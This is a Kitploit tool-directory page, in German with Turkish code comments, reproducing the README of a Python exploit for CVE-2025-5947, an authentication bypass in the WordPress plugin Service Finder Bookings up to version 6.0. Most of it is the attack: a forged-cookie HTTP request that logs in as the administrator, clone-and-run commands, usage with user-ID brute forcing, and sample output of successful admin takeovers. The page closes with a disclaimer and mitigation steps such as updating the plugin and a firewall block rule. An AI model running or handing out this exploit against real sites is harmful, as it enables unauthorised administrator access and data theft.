Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-5947 — CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit | Kitploit
Tools/GitHubGitHub/xxconi/cve-2025-5947
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubxxconi/cve-2025-5947

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit

Repository anzeigen
5vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-5947

CVE-2025-5947 Exploit für WordPress Service Finder Bookings ≤ 6.0

CVE-2025-5947 Exploit - Service Finder Bookings

License Python Status CVSS

Exploit-Tool für die Authentifizierungs-Bypass-Schwachstelle im WordPress-Plugin Service Finder Bookings ≤ 6.0

📋 Inhaltsverzeichnis

  • Über die Schwachstelle
  • Technische Details
  • Installation
  • Verwendung
  • Beispiele
  • Ergebnisse
  • Sicherheit
  • Quellen

🔴 Über die Schwachstelle

CVE-2025-5947

In Version 6.0 und früheren Versionen des WordPress-Plugins Service Finder Bookings existiert eine kritische Authentifizierungs-Bypass-Schwachstelle.

🎯 Auswirkung

Nicht authentifizierte Angreifer können:

  • ✅ Sich als beliebiger Benutzer anmelden
  • ✅ Zugriff auf Admin-Konten erlangen
  • ✅ Vollständige Systemkontrolle übernehmen
  • ✅ Daten exfiltrieren
  • ✅ Schadcode hochladen

🔍 Technische Details

Ursache der Schwachstelle

Die Funktion service_finder_switch_back() weist eine unzureichende Cookie-Validierung auf:

root@kitploit:~
// Güvenli olmayan kod
if(isset($_COOKIE['original_user_id'])) {
    $user_id = $_COOKIE['original_user_id'];
    wp_set_current_user($user_id);
    // Doğrulama yok!
}

Angriffsvektor

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1

Angriffsmerkmale:

  • 🌐 Netzwerkangriff (AV:N)
  • 🔓 Keine Authentifizierung (PR:N)
  • 👤 Keine Benutzerinteraktion (UI:N)
  • 📊 Vollständige Auswirkung (C:H, I:H, A:H)

📦 Installation

Voraussetzungen

  • Python 3.6+
  • requests-Bibliothek

Schritt 1: Repository klonen

root@kitploit:~
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947

Schritt 2: Abhängigkeiten installieren

root@kitploit:~
pip install -r requirements.txt

Schritt 3: Ausführen

root@kitploit:~
python exploit.py -u http://target.com

🚀 Verwendung

Grundlegende Befehle

root@kitploit:~
# Yardım göster
python exploit.py -h

# Admin (ID=1) olarak giriş dene
python exploit.py -u http://target.com

# Belirli kullanıcı ID'si ile
python exploit.py -u http://target.com -i 5

# Brute force (ID 1-10)
python exploit.py -u http://target.com -b 1-10

# SSL doğrulaması olmadan
python exploit.py -u http://target.com --no-ssl-verify

# Özel timeout ile
python exploit.py -u http://target.com -t 30

Parameter

💡 Beispiele

Beispiel 1: Einfacher Exploit

root@kitploit:~
python exploit.py -u http://wordpress.local

Ausgabe:

root@kitploit:~
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu

🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
   Location: http://wordpress.local/wp-admin/
   Set-Cookie: wordpress_logged_in_abc123=...

✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/

Beispiel 2: Brute Force

root@kitploit:~
python exploit.py -u http://target.com -b 1-20

Ausgabe:

root@kitploit:~
🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]

Beispiel 3: HTTPS ohne SSL-Validierung

root@kitploit:~
python exploit.py -u https://target.com --no-ssl-verify

📊 Ergebnisse

Ein erfolgreicher Exploit ist an folgenden Indikatoren erkennbar:

✅ HTTP-Statuscode 301 oder 302
✅ /wp-admin/ im Location-Header
✅ wordpress_logged_in_ im Set-Cookie-Header

🛡️ Sicherheit

⚠️ Rechtlicher Hinweis

Dieses Tool darf nur:

  • ✅ Für autorisierte Sicherheitstests
  • ✅ Auf eigenen Systemen
  • ✅ Mit schriftlicher Genehmigung

verwendet werden. Der Autor übernimmt keine Haftung.

🔐 Schutzmaßnahmen

  1. Sofort aktualisieren

    root@kitploit:~
    # WordPress admin panelinden güncelle
    # veya WP-CLI ile
    wp plugin update sf-booking
    
  2. Plugin deaktivieren

    root@kitploit:~
    wp plugin deactivate sf-booking
    
  3. Plugin entfernen

    root@kitploit:~
    wp plugin delete sf-booking
    
  4. Web Application Firewall (WAF)

    root@kitploit:~
    Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
    
  5. Sicherheitsprüfung

    • Admin-Konten überprüfen
    • Zugriffsprotokolle untersuchen
    • Nach unbefugten Anmeldungen suchen

📚 Quellen

  • Patchstack-Datenbank
  • GitHub Advisory
  • NVD-Details
  • Original-Exploit
  • CVSS-Rechner

🤝 Mitwirken

Um Fehler zu melden oder Verbesserungen vorzuschlagen:

  1. Forke das Repository
  2. Erstelle einen Feature-Branch (git checkout -b feature/improvement)
  3. Committe deine Änderungen (git commit -am 'Add improvement')
  4. Pushe den Branch (git push origin feature/improvement)
  5. Eröffne einen Pull Request

📄 Lizenz

MIT-Lizenz – Details findest du in der Datei LICENSE

👤 Autor

Security Researcher

  • GitHub: @yourusername

🙏 Danksagungen

  • Patchstack Security Team
  • WordPress Security Community
  • CVE-Koordinatoren

⭐ Wenn dir dieses Tool nützlich erscheint, gib einen Stern!

🔝 Nach oben

Tool herunterladen
EigenschaftWert
CVE IDCVE-2025-5947
PluginService Finder Bookings (sf-booking)
Betroffene Version≤ 6.0
Schweregrad🔴 KRITISCH
CVSS-Score9.8
CWECWE-639 (Authorization Bypass)
EPSS-Score0.617 (98.357 Perzentil)
Veröffentlichungsdatum2025
ParameterAbkürzungBeschreibungStandard
--url-uZiel-URL (erforderlich)-
--user-id-iBenutzer-ID1
--brute-force-bBrute-Force-Bereich (1-10)-
--no-ssl-verify-SSL-Validierung deaktivierenFalse
--timeout-tAnfrage-Timeout (Sekunden)10